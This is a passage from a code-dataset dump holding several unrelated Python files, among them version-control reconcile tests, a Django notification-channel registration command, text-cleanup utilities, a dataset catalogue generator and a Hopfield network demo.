some file\" + \"\\n\")\n\n parameters.assert_submit_success([str(tmp_dir) + \"/\"])\n\n for i in range(0, 9):\n file_path = tmp_dir.join(f\"new_file{i}.txt\")\n assert parameters.file_present(str(file_path))\n\n # Create and reconcile a directory in a directory\n another_dir = tmp_dir.mkdir(\"another_directory\")\n tmp_file = another_dir.join(\"new_file.txt\")\n tmp_file.write(\"This is some file\" + \"\\n\")\n\n parameters.assert_submit_success([str(tmp_dir) + \"/\"])\n assert parameters.file_present(str(tmp_file))\n\n # Modify some vcs\n text = utils.randomize_name(\"This is change \")\n for i in range(0, 9, 2):\n tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n tmp_file.write(text + \"\\n\")\n\n parameters.assert_submit_success([str(tmp_dir) + \"/\"], edit_only=True)\n\n for i in range(0, 9, 2):\n file_path = tmp_dir.join(f\"/new_file{i}.txt\")\n assert parameters.text_in_file(text, str(file_path))\n\n # Delete a directory\n shutil.rmtree(tmp_dir)\n parameters.assert_submit_success([str(tmp_dir)])\n assert not parameters.file_present(str(tmp_dir))\n\n\ndef test_success_reconcile_wildcard(submit_parameters, submit_environment):\n parameters = submit_parameters(submit_environment)\n\n dir_name = utils.randomize_name(\"new_directory\")\n\n # Create embedded directories, partially reconcile\n tmp_dir = 
parameters.environment.vcs_cooking_dir.mkdir(dir_name)\n    inner_dir = tmp_dir.mkdir(\"inner_directory\")\n    text = \"This is some file\" + \"\\n\"\n    for i in range(0, 9):\n        tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(text)\n        tmp_file = tmp_dir.join(f\"another_file{i}.txt\")\n        tmp_file.write(text)\n        tmp_file = inner_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(text)\n\n    parameters.assert_submit_success([str(tmp_dir) + \"/new_file*.txt\"])\n\n    for i in range(0, 9):\n        file_name = f\"new_file{i}.txt\"\n        file_path = tmp_dir.join(file_name)\n        assert parameters.file_present(str(file_path))\n        file_path = inner_dir.join(file_name)\n        assert not parameters.file_present(str(file_path))\n        file_name = f\"another_file{i}.txt\"\n        file_path = tmp_dir.join(file_name)\n        assert not parameters.file_present(str(file_path))\n\n    # Create one more directory\n    other_dir_name = utils.randomize_name(\"new_directory\")\n    other_tmp_dir = parameters.environment.vcs_cooking_dir.mkdir(other_dir_name)\n    for i in range(0, 9):\n        tmp_file = other_tmp_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(\"This is some file\" + \"\\n\")\n\n    parameters.assert_submit_success([str(parameters.environment.vcs_cooking_dir) + \"/new_directory*/\"])\n\n    for i in range(0, 9):\n        file_name = f\"new_file{i}.txt\"\n        file_path = other_tmp_dir.join(file_name)\n        assert parameters.file_present(str(file_path))\n        file_path = inner_dir.join(file_name)\n        assert parameters.file_present(str(file_path))\n        file_name = f\"another_file{i}.txt\"\n        file_path = tmp_dir.join(file_name)\n        assert parameters.file_present(str(file_path))\n\n    # Modify some vcs\n    text = utils.randomize_name(\"This is change \")\n    for i in range(0, 9, 2):\n        tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(text + \"\\n\")\n        tmp_file = inner_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(text + \"\\n\")\n        tmp_file = tmp_dir.join(f\"another_file{i}.txt\")\n        tmp_file.write(text + \"\\n\")\n\n    parameters.assert_submit_success([str(tmp_dir) + \"/new_file*.txt\"], edit_only=True)\n\n    for i in range(0, 9, 2):\n        file_path = tmp_dir.join(f\"/new_file{i}.txt\")\n        assert parameters.text_in_file(text, str(file_path))\n        file_path = inner_dir.join(f\"/new_file{i}.txt\")\n        assert not parameters.text_in_file(text, str(file_path))\n        file_path = tmp_dir.join(f\"/another_file{i}.txt\")\n        assert not parameters.text_in_file(text, str(file_path))\n\n    # Test subdirectory wildcard\n    text = utils.randomize_name(\"This is change \")\n    for i in range(1, 9, 2):\n        tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(text + \"\\n\")\n        tmp_file = inner_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(text + \"\\n\")\n        tmp_file = tmp_dir.join(f\"another_file{i}.txt\")\n        tmp_file.write(text + \"\\n\")\n\n    parameters.assert_submit_success([str(tmp_dir) + \"/*/*.txt\"])\n\n    for i in range(1, 9, 2):\n        file_path = inner_dir.join(f\"new_file{i}.txt\")\n        assert parameters.text_in_file(text, str(file_path))\n        file_path = tmp_dir.join(f\"new_file{i}.txt\")\n        assert not parameters.text_in_file(text, str(file_path))\n        file_path = tmp_dir.join(f\"another_file{i}.txt\")\n        assert not parameters.text_in_file(text, str(file_path))\n\n    # Test edit-only subdirectory wildcard\n    text = utils.randomize_name(\"This is change \")\n    for i in range(0, 9, 3):\n        tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(text + \"\\n\")\n        tmp_file = inner_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(text + \"\\n\")\n        tmp_file = tmp_dir.join(f\"another_file{i}.txt\")\n        tmp_file.write(text + 
\"\\n\")\n\n    parameters.assert_submit_success([str(tmp_dir) + \"/*/*.txt\"], edit_only=True)\n\n    for i in range(0, 9, 3):\n        file_path = inner_dir.join(f\"new_file{i}.txt\")\n        assert parameters.text_in_file(text, str(file_path))\n        file_path = tmp_dir.join(f\"new_file{i}.txt\")\n        assert not parameters.text_in_file(text, str(file_path))\n        file_path = tmp_dir.join(f\"another_file{i}.txt\")\n        assert not parameters.text_in_file(text, str(file_path))\n\n    # Clean up the repo\n    shutil.rmtree(str(tmp_dir))\n    shutil.rmtree(str(other_tmp_dir))\n    parameters.assert_submit_success([str(parameters.environment.vcs_cooking_dir) + \"/*\"])\n    assert not parameters.file_present(str(tmp_dir))\n    assert not parameters.file_present(str(other_tmp_dir))\n\n\ndef test_success_reconcile_partial(submit_parameters, submit_environment):\n    # This test used to fail when a bug in universum.lib.utils.unify_argument_list left empty entries in processed lists\n    # When reconciling \"\", p4 adds to CL all changes made in scope of workspace (and therefore partial reconcile fails)\n\n    parameters = submit_parameters(submit_environment)\n    dir_name = utils.randomize_name(\"new_directory\")\n    tmp_dir = parameters.environment.vcs_cooking_dir.mkdir(dir_name)\n    for i in range(0, 9):\n        tmp_file = tmp_dir.join(f\"new_file{i}.txt\")\n        tmp_file.write(\"This is some file\" + \"\\n\")\n\n    reconcile_list = [str(tmp_dir.join(f\"new_file{i}.txt\")) for i in range(0, 4)]\n    reconcile_list.extend([\"\", \" \", \"\\n\"])\n    parameters.assert_submit_success(reconcile_list)\n\n    for i in range(0, 4):\n        file_path = tmp_dir.join(f\"new_file{i}.txt\")\n        assert parameters.file_present(str(file_path))\n\n    for i in range(5, 9):\n        file_path = tmp_dir.join(f\"new_file{i}.txt\")\n        assert not parameters.file_present(str(file_path))\n\n    # Delete a directory\n    shutil.rmtree(tmp_dir)\n    parameters.assert_submit_success([str(tmp_dir)])\n    assert not parameters.file_present(str(tmp_dir))\n","sub_path":"tests/test_submit.py","file_name":"test_submit.py","file_ext":"py","file_size_in_byte":15335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"398633598","text":"\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\nimport numpy\nimport cython_gsl\n\nextra_args = []\n\nexts = [\n    Extension(\"estimator2\",\n              [\"estimator2.pyx\"],\n              include_dirs=[numpy.get_include()],\n              extra_compile_args=extra_args,\n              extra_link_args=extra_args),\n    Extension(\"util\",\n              [\"util.pyx\"],\n              include_dirs=[numpy.get_include()],\n              extra_compile_args=extra_args,\n              extra_link_args=extra_args),\n    Extension(\"prob_estimator\",\n              [\"prob_estimator.pyx\"],\n              include_dirs=[numpy.get_include()],\n              extra_compile_args=extra_args,\n              extra_link_args=extra_args),\n    Extension(\"search_model_tools\",\n              [\"search_model_tools.pyx\"],\n              include_dirs=[numpy.get_include(), cython_gsl.get_cython_include_dir()],\n              libraries=cython_gsl.get_libraries(),\n              library_dirs=[cython_gsl.get_library_dir()],\n              extra_compile_args=extra_args,\n              extra_link_args=extra_args),\n    ]\n\nsetup(\n    include_dirs = [cython_gsl.get_include()],\n    cmdclass = {'build_ext': build_ext},\n    ext_modules = exts,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"64177899","text":"\n\nfrom xai.brain.wordbase.nouns._pillion import _PILLION\n\n#class header\nclass _PILLIONS(_PILLION, ):\n\tdef 
__init__(self,): \n\t\t_PILLION.__init__(self)\n\t\tself.name = \"PILLIONS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"pillion\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_pillions.py","file_name":"_pillions.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"206761702","text":"\r\n\r\n\r\n###Social transfer Data\r\n\r\n\r\n####early warning system\r\n\r\n###Income group\r\n\r\n\r\n###Country Ratings\r\n\r\n\r\n#Transforms ratings letters into 1-100 numbers\r\n\r\n\r\n###Ratings + HFA\r\ndf['borrow_abi']=(df['rating']+df['finance_pre'])/2 # Ability and willingness to improve transfers after the disaster\r\n\r\n\r\n##Hazards data\r\n###Vulnerability\r\n#VULNERABILITY OF EACH HOUSEHOLD, BUT NEED A VULNERABILITY CURVE TO TRANSLATE HOUSING TYPE INTO VULNERABILITY VALUE\r\n\r\n#EXPOSURE TO FLOOD FROM SURVEY HAZARD DATA/GLOFRIS\r\n\r\n##Protection\r\n\r\n\r\n##Data by income categories\r\ncat_info =pd.DataFrame()\r\ncat_info['n'] = concat_categories(ph,(1-ph),index= income_cats)\t#number\r\ncp= df['share1'] /ph *df['gdp_pc_pp']\t#consumption levels, by definition.\r\ncr=(1-df['share1'])/(1-ph)*df['gdp_pc_pp']\r\ncat_info['c'] = concat_categories(cp,cr,index= income_cats)\r\ncat_info['social'] = concat_categories(df.social_p,df.social_r,index= income_cats)\t#diversification\r\ncat_info['axfin'] = concat_categories(df.axfin_p,df.axfin_r,index= income_cats)\t#access to finance\r\ncat_info = cat_info.dropna()\r\n\r\n##Taxes, redistribution, capital\r\ndf['tau_tax'],cat_info['gamma_SP'] = social_to_tx_and_gsp(economy,cat_info)\t#computes tau tax and gamma_sp from socail_poor and social_nonpoor. CHECKED!\r\ncat_info['k'] = (1-cat_info['social'])*cat_info['c']/((1-df['tau_tax'])*df['avg_prod_k']) #here k in cat_info has poor and non poor, while that from capital_data.csv has only k, regardless of poor or nonpoor\r\n\r\n\r\n\r\n#access to early warnings\r\n\r\n\r\n\r\n\r\n\r\nif drop_unused_data:\r\n cat_info= cat_info.drop(['social'],axis=1, errors='ignore').dropna()\r\n df_in = df.drop(['social_p', 'social_r','share1','pov_head', 'pe','vp','vr', 'axfin_p', 'axfin_r','rating','finance_pre'],axis=1, errors='ignore').dropna()\r\nelse :\r\n df_in = df.dropna()\r\ndf_in = df_in.drop([ 'shew','v'],axis=1, errors='ignore').dropna()\r\n\r\n#Save all data\r\nfa_guessed_gar.to_csv(intermediate+'/fa_guessed_from_GAR_and_PAGER_shaved.csv',encoding='utf-8', header=True)\r\npd.DataFrame([vp,vr,v], index=['vp','vr','v']).T.to_csv(intermediate+'/v_pr_fromPAGER_shaved_GAR.csv',encoding='utf-8', header=True)\r\ndf_in.to_csv(intermediate+'/macro.csv',encoding='utf-8', header=True)\r\ncat_info.to_csv(intermediate+'/cat_info.csv',encoding='utf-8', header=True)\r\nhazard_ratios.to_csv(intermediate+'/hazard_ratios.csv',encoding='utf-8', header=True)\r\n\r\n","sub_path":"lib_aux_module_1.py","file_name":"lib_aux_module_1.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"554673262","text":"\nimport sys\nimport os\nfrom datetime import datetime\nimport config\nimport daq\n\ndef print_plot(variable, data):\n\n print('set grid')\n print('set xdata time')\n print('set timefmt \"%Y-%m-%dT%H:%M:%S\"')\n print('set format x \"%H:%M\"')\n sys.stdout.write('plot \"-\" using 1:2 with lines;\\n')\n for time, value in data:\n sys.stdout.write('{} {}\\n'.format(time.isoformat(), value))\n sys.stdout.write('e\\n')\n\n\n 
#vars = list([v for a in sys.argv for v in config.ARCH_VARIABLES if a == v['arch-id']])\n\n # print plot arguments\n #for v in vars:\n # title = v['plot-title'] if 'plot-title' in v else v['arch-id']\n # color = 'linecolor \"{}\"'.format(v['plot-color']) if 'plot-color' in v else ''\n # sys.stdout.write('\"-\" using 1:2 with lines {} title \"{}\" , '.format(color, title))\n #sys.stdout.write(';\\n')\n\n # print out the data\n #for v in vars:\n # file_name = ''.join((config.ARCH_DIR, v['arch-file']))\n # with open(file_name, 'r') as f:\n # for line in f:\n # timestamp, value = line.split(',')\n # sys.stdout.write('{} {}'.format(timestamp, value))\n # print('e\\n')\n\nif __name__ == \"__main__\":\n variable = sys.argv[1]\n time_interval = (\n datetime.strptime(sys.argv[2], '%Y-%m-%dT%H:%M:%S'),\n datetime.strptime(sys.argv[3], '%Y-%m-%dT%H:%M:%S')\n )\n print_plot(variable, daq.get(variable, time_interval))\n","sub_path":"rec/tools/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"217872317","text":"import logging\n\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom django.core.management.base import BaseCommand\nfrom django.urls import reverse\nfrom django.utils.module_loading import import_string\n\nfrom ....models import APICredential\nfrom ...constants import SCOPE_NOTIFICATIES_PUBLICEREN_LABEL\nfrom ...kanalen import KANAAL_REGISTRY\nfrom ...models import NotificationsConfig\n\nlogger = logging.getLogger(__name__)\n\n\nclass KanaalExists(Exception):\n pass\n\n\ndef create_kanaal(api_root: str, kanaal: str) -> None:\n \"\"\"\n Create a kanaal, if it doesn't exist yet.\n \"\"\"\n Client = import_string(settings.ZDS_CLIENT_CLASS)\n\n if not api_root.endswith(\"/\"):\n api_root = f\"{api_root}/\"\n\n client = Client.from_url(api_root)\n client.base_url = api_root\n client.auth = APICredential.get_auth(\n api_root, scopes=[SCOPE_NOTIFICATIES_PUBLICEREN_LABEL]\n )\n\n # look up the exchange in the registry\n _kanaal = next(k for k in KANAAL_REGISTRY if k.label == kanaal)\n\n kanalen = client.list(\"kanaal\", query_params={\"naam\": kanaal})\n if kanalen:\n raise KanaalExists()\n\n # build up own documentation URL\n domain = Site.objects.get_current().domain\n protocol = \"https\" if settings.IS_HTTPS else \"http\"\n documentation_url = (\n f\"{protocol}://{domain}{reverse('notifications:kanalen')}#{kanaal}\"\n )\n\n client.create(\n \"kanaal\",\n {\n \"naam\": kanaal,\n \"documentatieLink\": documentation_url,\n \"filters\": list(_kanaal.kenmerken),\n },\n )\n\n\nclass Command(BaseCommand):\n help = \"Create kanaal in notification component\"\n\n def add_arguments(self, parser):\n parser.add_argument(\"kanaal\", nargs=\"?\", type=str, help=\"Name of kanaal\")\n parser.add_argument(\n \"--notificaties-api-root\",\n help=\"API root of the NC, default value taken from notifications config\",\n )\n\n def handle(self, **options):\n config = NotificationsConfig.get_solo()\n\n # use CLI arg or fall back to database config\n api_root = options[\"notificaties_api_root\"] or config.api_root\n\n # use CLI arg or fall back to setting\n kanaal = options[\"kanaal\"] or settings.NOTIFICATIONS_KANAAL\n\n try:\n create_kanaal(api_root, kanaal)\n self.stdout.write(f\"Registered kanaal '{kanaal}' with {api_root}\")\n except KanaalExists:\n self.stderr.write(f\"Kanaal '{kanaal}' already exists within 
{api_root}\")\n","sub_path":"vng_api_common/notifications/management/commands/register_kanaal.py","file_name":"register_kanaal.py","file_ext":"py","file_size_in_byte":2524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"323578098","text":"# First, if any digit in N is not one of {0,1,6,8,9}, it's not a confusing number.\r\n# Second, if rotate_180_degree(N) is not equal to N, then it's a confusing number. Because it caused ambiguity after rotated by 180 degree.\r\n# And what rotate_180_degree() do is to reverse the entire N and change 6 to 9 and 9 to 6.\r\n\r\nclass Solution(object):\r\n def confusingNumber(self, N):\r\n x, y = N, 0\r\n mapping = {0:0, 1:1, 6:9, 8:8, 9:6}\r\n while N:\r\n n, m = divmod(N, 10) # divmod(89, 10) = (8, 9)\r\n if m not in mapping: \r\n return False\r\n N, y = n, y*10 + mapping[m]\r\n \r\n return x != y\r\n \r\n \r\n# Time: O(log_10 n)\r\n# Space: O(1)","sub_path":"17 Math/1056. Confusing Number.py","file_name":"1056. Confusing Number.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455569572","text":"import numpy as np\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom . import Node\n\nclass Graph:\n def __init__(self, name=''):\n self.name = name\n self.nodes = np.array([], dtype=Node)\n\n def add_node(self, node):\n if type(node) == Node:\n if not node in self.nodes:\n if (len(node.edges) == 0) or (node.edges.dtype == Node and node.edges in self.nodes):\n self.nodes = np.concatenate((self.nodes, np.array([node], dtype=Node)))\n else:\n print(\"Can't add node. Invalid type.\")\n\n def add_nodes(self, nodes): \n for node in nodes:\n self.add_node(node)\n\n @property\n def list_nodes(self):\n for node in self.nodes:\n print(\"Name: {0}, Description: {1}, Edges: {2}\".format(node.name, node.description, node.edges))\n\n def plot(self):\n G = nx.Graph()\n # add nodes first\n for n in self.nodes:\n G.add_node(n.name)\n # then add edges to nodes\n for n in self.nodes:\n for id, ne in enumerate(n.edges):\n print(n.name, ne.name)\n if len(ne.edges) > 0:\n G.add_edge(n.name, ne.name, weight=ne.edges_weight[id-1])\n # G = nx.petersen_graph()\n plt.subplot(121)\n nx.draw_random(G, with_labels=True, font_weight='bold')\n plt.show()\n","sub_path":"src/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"280394033","text":"import re\nimport os\nimport json\nimport glob\n\n\ndef cleanup_list(empsdata):\n empclr = CleanupString(empsdata)\n empclr_methods = dir(empclr)\n empclr_methods = [i for i in empclr_methods if '__' not in i]\n empclr_methods.remove('empsdata')\n empclr_methods.remove('empsdict')\n crap_data = []\n for empclr_method in empclr_methods:\n param = ''\n result = []\n if 'max_length' in empclr_method:\n param = 90\n elif 'min_length' in empclr_method:\n param = 2\n if param:\n result = empclr.__getattribute__(empclr_method)(param)\n else:\n result = empclr.__getattribute__(empclr_method)()\n crap_data.extend(result)\n valid = list(set(empsdata) - set(crap_data))\n return valid\n\n\nclass CleanupString(object):\n\n def __init__(self, empsdata):\n self.empsdata = empsdata\n self.empsdict = {i.lower(): i for i in self.empsdata}\n\n def duplicates(self):\n result = [\n i for i, j in zip(self.empsdata, self.empsdata[1:])\n if i.lower() in j.lower()]\n return result\n\n def 
string_max_length(self, strlen=50):\n result = [i for i in self.empsdata if len(i) >= strlen]\n return result\n\n def string_min_length(self, strlen=3):\n result = [i for i in self.empsdata if len(i) <= strlen]\n return result\n\n def string_consecutive_multiple_special_characters(self):\n result = [i for i in self.empsdata\n if re.search(\n r'(([`\\&\\)\\(\\_\\.\\,\\:\\*\\^\\%\\$\\#\\@\\!\\~\\+\\?\\>\\<\\{\\}\\/\\\\\\=\\;\\|\\\"\\[\\]\\-\\'\\ ])\\2)',\n i)]\n return result\n\n def string_consecutive_multiple_characters(self, count=4):\n result = [i for i in self.empsdata if re.search(r'((\\w)\\2{3,})', i)]\n return result\n\n def institute_string_invalid_special_character(self):\n result = [i for i in self.empsdata\n if re.search(r'[*\\^\\%\\$\\#\\@\\~\\+\\?\\>\\<\\{\\}\\/\\\\\\=\\;\\]\\[\\|]',\n i)]\n return result\n\n def check_absent_space_after_comma(self):\n result = [i for i in self.empsdata if ',' in i\n and ', ' not in i]\n return result\n\n def string_contains_month(self):\n words = [' january ', ' february ', ' march ', ' april ',\n ' july ', ' august ', ' september ', ' october ',\n ' november ', ' december ']\n result = [i for i in self.empsdata if re.search(r'\\d+', i)]\n result.extend([i for i in self.empsdata if any(x in i for x in words)])\n return result\n\n def string_start_with_more_than_2_digit_nums(self):\n result = [i for i in self.empsdata if re.search(r'^\\d{3}', i)]\n return result\n\n def check_proper_bracket_absent(self):\n result = []\n for term in self.empsdata:\n stack = []\n for i in term:\n if i == '(':\n stack.append(i)\n elif i == ')' and stack:\n stack.pop()\n elif i == ')' and not stack:\n result.append(term)\n stack = []\n break\n if stack:\n result.append(term)\n return result\n\n def check_words(self, strlen=50):\n check = [line.rstrip() for line in open('data/lists/check_words.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() in i.lower().split() for x in check)]\n return result\n\n def string_is_website_name(self):\n check = [line.rstrip() for line in open('data/lists/website_name.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() in i.lower() for x in check)]\n return result\n\n def weird_universities(self):\n check = [line.rstrip()\n for line in open('data/lists/weird_universities.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() == i.lower() for x in check)]\n return result\n\n def first_word(self):\n check = [line.rstrip() for line in open('data/lists/first_word.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() == i.lower().split()[0] for x in check)]\n return result\n\n def last_word(self):\n check = [line.rstrip() for line in open('data/lists/last_word.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() == i.lower().split()[-1] for x in check)]\n return result\n\n def check_degree(self):\n check = [line.rstrip() for line in open('data/lists/check_degree.txt')]\n result = [i for i in self.empsdata if any(\n x.lower() in i.lower().split() for x in check)]\n return result\n","sub_path":"cleanup_utils.py","file_name":"cleanup_utils.py","file_ext":"py","file_size_in_byte":4741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"439200672","text":"import os\nimport sys\nimport glob\nimport errno\nimport operator\nimport json\nimport codecs\n\nfrom urllib.parse import urlparse\n\nPATH_TO_DATA = \"_data\"\nPATH_TO_LIBRARY = 'data-library/'\n\ndef split_last(s, c):\n words = s.split(c)\n return words[len(words) - 1]\n\ndef 
extract_domain_from_url(url):\n parsed_uri = urlparse(url)\n domain = '{uri.netloc}'.format(uri=parsed_uri)\n domain = domain.replace(\"www.\", \"\")\n #result = '{uri.scheme}://{uri.netloc}/'.format(uri=parsed_uri)\n \n return domain\n\n# GENERATE TEMPLATE FILE\nPATH_TO_DATASET = \"dataset\"\nURL_DATASET = \"/dataset\"\n\ndef write_template_file(file_path, layout, permalink, title, options={}):\n if not os.path.exists(os.path.dirname(file_path)):\n os.makedirs(os.path.dirname(file_path))\n\n f = codecs.open(file_path, \"w+\", \"utf-8\")\n f.write(\"---\\n\")\n f.write(\"layout: '{0}'\\n\".format(layout))\n f.write(\"permalink: '{0}'\\n\".format(permalink))\n f.write(\"title: '{0}'\\n\".format(title))\n for keyField in options:\n f.write(str(keyField) + \": '\" + options[keyField] + \"'\\n\")\n f.write(\"---\\n\")\n f.close()\n\nDATASET = {}\nfor subdir, dirs, files in os.walk(PATH_TO_LIBRARY):\n try:\n item = {}\n for filename in files:\n file = subdir + '/' + filename\n if os.path.isfile(file):\n with open(file) as f: # No need to specify 'r': this is the default.\n # datasetDoc\n if filename == 'datasetDoc.json':\n item[\"datasetDoc\"] = json.load(f)\n # pipeline\n if filename == 'best_pipeline.json':\n item[\"pipeline\"] = json.load(f)\n # problemDoc\n if filename == 'problemDoc.json':\n item[\"problemDoc\"] = json.load(f)\n\n if bool(item):\n # set path to detail page\n name = split_last(subdir, '/')\n item[\"dataset_path\"] = name.replace(\"_\", \"-\")\n\n DATASET[name] = item\n except IOError as exc:\n if exc.errno != errno.EISDIR:\n raise \"Error when load data\"\n\n\n# Save to _data directory\nfile_path = PATH_TO_DATA + \"/\" + \"datasets.json\"\nwith open(file_path, \"w+\") as f:\n json.dump(DATASET, f)\nprint(\"LOG: Saved datasets to\", file_path)\n\n# Extract Domain from URL\nLIST_DOMAIN = []\nfor dataset_name in DATASET:\n data = DATASET[dataset_name]\n if \"sourceURI\" in data[\"datasetDoc\"][\"about\"]:\n sourceURI = data[\"datasetDoc\"][\"about\"][\"sourceURI\"]\n if sourceURI:\n domain = extract_domain_from_url(sourceURI)\n if domain not in LIST_DOMAIN:\n LIST_DOMAIN.append(domain)\n# Save to _data directory\nfile_path = PATH_TO_DATA + \"/\" + \"domains.json\"\nwith open(file_path, \"w+\") as f:\n json.dump(LIST_DOMAIN, f)\nprint(\"LOG: Saved domains to\", file_path)\n\n# Task Type\nLIST_TASKTYPE = []\nfor dataset_name in DATASET:\n data = DATASET[dataset_name]\n task_type = data[\"pipeline\"][\"loader\"][\"task_type\"]\n if task_type and task_type not in LIST_TASKTYPE:\n LIST_TASKTYPE.append(task_type)\n# Save to _data directory\nfile_path = PATH_TO_DATA + \"/\" + \"tasktype.json\"\nwith open(file_path, \"w+\") as f:\n json.dump(LIST_TASKTYPE, f)\nprint(\"LOG: Saved task_type to\", file_path)\n\n# Data Type\nLIST_DATATYPE = []\nfor dataset_name in DATASET:\n data = DATASET[dataset_name]\n data_type = data[\"pipeline\"][\"loader\"][\"data_modality\"]\n if data_type and data_type not in LIST_DATATYPE:\n LIST_DATATYPE.append(data_type)\n# Save to _data directory\nfile_path = PATH_TO_DATA + \"/\" + \"datatype.json\"\nwith open(file_path, \"w+\") as f:\n json.dump(LIST_DATATYPE, f)\nprint(\"LOG: Saved data_type to\", file_path)\n\n# Generate template for detail dataset\nfor datasetID in DATASET:\n data = DATASET[datasetID]\n dataset_path = data[\"dataset_path\"]\n datasetName = data['problemDoc']['_id']\n if dataset_path:\n detail_path = PATH_TO_DATASET + \"/\" + dataset_path + \".md\"\n layout = \"detail\"\n permalink = PATH_TO_DATASET + \"/\" + dataset_path\n title = 
datasetName.capitalize()\n options = {\"datasetID\": datasetID}\n write_template_file(detail_path, layout, permalink, title, options)\n","sub_path":"scripts/collection_data.py","file_name":"collection_data.py","file_ext":"py","file_size_in_byte":4060,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"132597683","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 13 15:04:53 2020\r\n\r\n@author: ideapad\r\n\"\"\"\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom tqdm import tqdm\r\nfrom sklearn.metrics import mean_squared_error\r\n\r\ndef import_image(name):\r\n '''\r\n Import image from .txt files and return arrays\r\n '''\r\n df=pd.read_csv(name+'.txt',header=None)\r\n name_arr=np.array(df)\r\n name_arr=np.sign(name_arr)\r\n plt.imshow(name_arr,cmap='Greys_r')\r\n plt.title(f'Image of {name}')\r\n plt.show()\r\n return name_arr\r\n \r\nball=import_image('ball')\r\nmona=import_image('mona')\r\ncat=import_image('cat')\r\n\r\n\r\nvec_size=ball.shape[0]*ball.shape[1]\r\nu=np.zeros(vec_size)\r\nball_S=np.reshape(ball,(vec_size,1))\r\ncat_S=np.reshape(cat,(vec_size,1))\r\nmona_S=np.reshape(mona,(vec_size,1))\r\n\r\n\r\nclass Hopfield_Net():\r\n def __init__(self,niter):\r\n self.V = np.zeros((9000,1))\r\n self.U = np.zeros((9000,1))\r\n self.weights = np.zeros((9000,9000))\r\n self.U_d = np.zeros((9000,1))\r\n self.rmse = np.zeros((niter,1))\r\n self.flag = 0 # to load all images or only ball\r\n \r\n def load_weights(self):\r\n '''\r\n loads all images\r\n '''\r\n if self.flag==1:\r\n print('Loading all images')\r\n self.weights = np.matmul(mona_S,mona_S.T) + np.matmul(ball_S,ball_S.T) + np.matmul(cat_S,cat_S.T)\r\n if self.flag==0:\r\n print('Loading the image of the ball')\r\n self.weights = np.matmul(ball_S,ball_S.T)\r\n \r\n def image_loader(self,image):\r\n '''\r\n Loads patches of images\r\n '''\r\n new_image = np.zeros((90,100))\r\n new_image[0:45,25:50] = image[0:45,25:50]\r\n return new_image\r\n \r\n def damage_weights(self,p):\r\n '''\r\n Damages the weights of the network with probability p\r\n '''\r\n indices = np.random.randint(0,9000*9000-1,int(9000*9000*p))\r\n weights_damaged=np.copy(self.weights)\r\n weights_damaged=np.reshape(weights_damaged,(9000*9000,1))\r\n print('Damaging the weights')\r\n for i in tqdm(range(len(indices))):\r\n weights_damaged[indices[i]]=0\r\n weights_damaged = np.reshape(weights_damaged,(9000,9000))\r\n return weights_damaged\r\n \r\n \r\n \r\n \r\ndef demo(niter,lambdas,flag,p):\r\n dt=1/(100)\r\n Hop_net1=Hopfield_Net(niter)\r\n Hop_net1.flag=flag\r\n Hop_net1.load_weights()\r\n Hop_net1.U = np.reshape(Hop_net1.image_loader(ball),(9000,1))\r\n Hop_net1.weights=Hop_net1.damage_weights(p)\r\n Hop_net1.weights=Hop_net1.weights/9000\r\n images_arr=[]\r\n for i in tqdm(range(niter)):\r\n Hop_net1.U_d = -Hop_net1.U + np.matmul(Hop_net1.weights,Hop_net1.V)\r\n Hop_net1.U = Hop_net1.U + (Hop_net1.U_d)*dt\r\n Hop_net1.V = np.tanh(lambdas*Hop_net1.U)\r\n Hop_net1.rmse[i]=mean_squared_error(ball_S,Hop_net1.V)\r\n \r\n img=np.reshape(Hop_net1.V,(90,100))\r\n images_arr.append(img)\r\n images_arr=np.array(images_arr)\r\n return images_arr,Hop_net1.rmse\r\n \r\ndef show(images_arr,rmse,niter,p):\r\n images_arr=np.array(images_arr)\r\n for i in range(int(niter/10)):\r\n 